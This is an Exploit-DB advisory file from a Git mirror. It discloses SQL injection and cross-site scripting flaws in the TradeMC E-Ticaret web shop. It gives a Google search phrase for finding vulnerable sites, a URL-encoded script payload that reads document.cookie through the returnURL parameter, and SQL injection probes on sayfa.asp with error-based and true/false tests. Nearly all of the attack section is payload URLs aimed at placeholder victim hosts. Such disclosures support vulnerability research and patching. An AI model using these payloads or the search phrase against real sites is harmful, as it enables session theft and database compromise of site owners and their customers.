bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/asp/webapps/15191.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

38 lines
No EOL
1.3 KiB
Text
Raw Permalink Blame History

===================================================
TradeMC E-Ticaret - (SQLi/XSS) Multiple Vulnerabilities
===================================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[+] Special Thanks : H4x0re Security 2010, inj3ct0r team
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : TradeMC E-Ticaret
~Software: http://www.trademc.net/
~Vulnerability Style : SQL-i (XSS) Multiple
~Google Keywords : "TradeMC Tarafýndan Hazýrlanmýþtýr"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Meterials : SQLInjection TOOL or Table name Bruteforcer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation XSS ~~~~~~~~~~~
Cross site Scripting:
http://Victim]/giris-hata.asp?returnURL=sepet.asp[Site SCRIPTING]
http://Victim]/giris-hata.asp?returnURL=sepet.asp%22%3E%3Ch1%3Eh4x0reSEC%3C/h1%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
~~~~~~~~ Explotation SQL-i~~~~~~~~~~~
SQL Injection(MSACCESS):
http://[Victim]/sayfa.asp?i=34' {Microsoft JET Database Engine error '80040e14'
~ SQL Injection : ON
http://[Victim]/sayfa.asp?i=34[SQL Injection]
http://[Victim]/sayfa.asp?i=34+and%201=1 {true}
http://[Victim]/sayfa.asp?i=34+and%201=0 {false}
goodluck.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reference in a new issue View git blame Copy permalink